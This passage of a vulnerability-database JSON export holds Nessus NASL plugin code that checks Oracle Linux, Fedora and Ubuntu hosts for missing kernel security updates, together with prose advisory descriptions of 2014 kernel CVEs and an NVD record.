(!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2929\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\", \"CVE-2014-5045\", \"CVE-2014-6410\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-1971\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.10\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-123.13.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:12:03", "description": "kernel-3.16.2-201 fixes CVE-2014-3186, CVE-2014-3181, and\nCVE-2014-3631.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2014-09-22T00:00:00", "title": "Fedora 20 : kernel-3.16.2-201.fc20 (2014-11031)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-3181", "CVE-2014-3631", "CVE-2014-6410"], "modified": "2014-09-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-11031.NASL", "href": "https://www.tenable.com/plugins/nessus/77767", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11031.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77767);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3186\", \"CVE-2014-6410\");\n script_bugtraq_id(69763, 69779, 69799);\n script_xref(name:\"FEDORA\", value:\"2014-11031\");\n\n script_name(english:\"Fedora 20 : kernel-3.16.2-201.fc20 (2014-11031)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"kernel-3.16.2-201 fixes CVE-2014-3186, CVE-2014-3181, and\nCVE-2014-3631.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141809\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137766.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?020bc348\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.16.2-201.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:12:02", "description": "The 3.14.19 stable update contains a number of important fixes across\nthe tree. The 3.14.18 stable update contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-09-30T00:00:00", "title": "Fedora 19 : kernel-3.14.19-100.fc19 (2014-11008)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-3181", "CVE-2014-5472", "CVE-2014-6410", "CVE-2014-5471"], "modified": "2014-09-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11008.NASL", "href": "https://www.tenable.com/plugins/nessus/77974", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11008.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77974);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3186\", \"CVE-2014-5471\", \"CVE-2014-5472\", \"CVE-2014-6410\");\n script_bugtraq_id(69396, 69428, 69763, 69779, 69799);\n script_xref(name:\"FEDORA\", value:\"2014-11008\");\n\n script_name(english:\"Fedora 19 : kernel-3.14.19-100.fc19 (2014-11008)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.19 stable update contains a number of important fixes across\nthe tree. The 3.14.18 stable update contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1134099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141809\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/139573.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?318b5645\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"kernel-3.14.19-100.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:58", "description": "Steven Vittitoe reported multiple stack buffer overflows in Linux\nkernel's magicmouse HID driver. A physically proximate attacker could\nexploit this flaw to cause a denial of service (system crash) or\npossibly execute arbitrary code via specially crafted devices.\n(CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in\nthe Linux kernel's HID stack. A physically proximate attacker could\nexploit these flaws to cause a denial of service (out-of-bounds write)\nvia a specially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were\ndiscovered in the Linux kernel's Whiteheat USB serial driver. A\nphysically proximate attacker could exploit these flaws to cause a\ndenial of service (system crash) via a specially crafted device.\n(CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's\nPicoLCD HID device driver. A physically proximate attacker could\nexploit this flaw to cause a denial of service (system crash) or\npossibly execute arbitrary code via a specially craft device.\n(CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on\nsome CD-ROMs and DVDs) when processing indirect ICBs. An attacker who\ncan cause CD, DVD or image file with a specially crafted inode to be\nmounted can cause a denial of service (infinite loop or stack\nconsumption). (CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in\nthe Linux kernel. A remote attacker could exploit this flaw to cause a\ndenial of service (memory consumption and panic) or possibly have\nother unspecified impact via a long unencrypted auth ticket.\n(CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation\nfailures in the Ceph filesystem. A remote attacker could exploit this\nflaw to cause a denial of service (system crash) or possibly have\nunspecified other impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates\nauth replies. A remote attacker could exploit this flaw to cause a\ndenial of service (system crash) or possibly have other unspecified\nimpact. (CVE-2014-6418).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2014-10-11T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2376-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "modified": "2014-10-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2376-1.NASL", "href": "https://www.tenable.com/plugins/nessus/78257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2376-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78257);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-6410\", \"CVE-2014-6416\", \"CVE-2014-6417\", \"CVE-2014-6418\");\n script_bugtraq_id(69763, 69768, 69779, 69781, 69799, 69805);\n script_xref(name:\"USN\", value:\"2376-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2376-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Steven Vittitoe reported multiple stack buffer overflows in Linux\nkernel's magicmouse HID driver. A physically proximate attacker could\nexploit this flaw to cause a denial of service (system crash) or\npossibly execute arbitrary code via specially crafted devices.\n(CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in\nthe Linux kernel's HID stack. A physically proximate attacker could\nexploit these flaws to cause a denial of service (out-of-bounds write)\nvia a specially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were\ndiscovered in the Linux kernel's Whiteheat USB serial driver. A\nphysically proximate attacker could exploit these flaws to cause a\ndenial of service (system crash) via a specially crafted device.\n(CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's\nPicoLCD HID device driver. A physically proximate attacker could\nexploit this flaw to cause a denial of service (system crash) or\npossibly execute arbitrary code via a specially craft device.\n(CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on\nsome CD-ROMs and DVDs) when processing indirect ICBs. An attacker who\ncan cause CD, DVD or image file with a specially crafted inode to be\nmounted can cause a denial of service (infinite loop or stack\nconsumption). (CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in\nthe Linux kernel. A remote attacker could exploit this flaw to cause a\ndenial of service (memory consumption and panic) or possibly have\nother unspecified impact via a long unencrypted auth ticket.\n(CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation\nfailures in the Ceph filesystem. A remote attacker could exploit this\nflaw to cause a denial of service (system crash) or possibly have\nunspecified other impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates\nauth replies. A remote attacker could exploit this flaw to cause a\ndenial of service (system crash) or possibly have other unspecified\nimpact. (CVE-2014-6418).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2376-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3181\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-6410\", \"CVE-2014-6416\", \"CVE-2014-6417\", \"CVE-2014-6418\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2376-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-70-generic\", pkgver:\"3.2.0-70.105\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-70-generic-pae\", pkgver:\"3.2.0-70.105\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-70-highbank\", pkgver:\"3.2.0-70.105\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-70-virtual\", pkgver:\"3.2.0-70.105\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:58:24", "description": "The rd_build_device_space function in drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not properly initialize a certain data structure, which allows local users to obtain sensitive information from ramdisk_mcp memory by leveraging access to a SCSI initiator.", "edition": 7, "cvss3": {}, "published": "2014-06-23T11:21:00", "title": "CVE-2014-4027", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.3, "vectorString": "AV:A/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4027"], "modified": "2020-08-21T18:24:00", "cpe": ["cpe:/a:f5:big-iq_application_delivery_controller:4.5.0", "cpe:/a:f5:big-ip_local_traffic_manager:12.0.0", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.0", "cpe:/a:f5:big-ip_webaccelerator:11.3.0", "cpe:/a:f5:big-ip_wan_optimization_manager:11.3.0", "cpe:/a:f5:big-iq_cloud:4.5.0", "cpe:/a:f5:big-ip_access_policy_manager:11.6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/a:f5:big-ip_link_controller:11.6.0", "cpe:/a:f5:big-ip_access_policy_manager:12.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.0", "cpe:/a:f5:big-ip_application_security_manager:12.0.0", "cpe:/o:suse:linux_enterprise_high_availability_extension:11", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.0", "cpe:/a:f5:big-ip_edge_gateway:11.3.0", "cpe:/a:f5:big-ip_domain_name_system:12.0.0", "cpe:/a:f5:big-ip_analytics:12.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.0.0", "cpe:/a:f5:big-iq_security:4.5.0", "cpe:/a:f5:big-ip_application_security_manager:11.6.0", "cpe:/a:f5:big-ip_analytics:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.0.0", "cpe:/o:suse:linux_enterprise_real_time_extension:11", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:suse:linux_enterprise_desktop:11", "cpe:/a:f5:big-iq_device:4.5.0", "cpe:/a:f5:enterprise_manager:3.1.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.0.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/a:f5:big-ip_protocol_security_module:11.4.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.0", "cpe:/a:f5:big-ip_link_controller:12.0.0"], "id": "CVE-2014-4027", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4027", "cvss": {"score": 2.3, "vector": "AV:A/AC:M/Au:S/C:P/I:N/A:N"}, 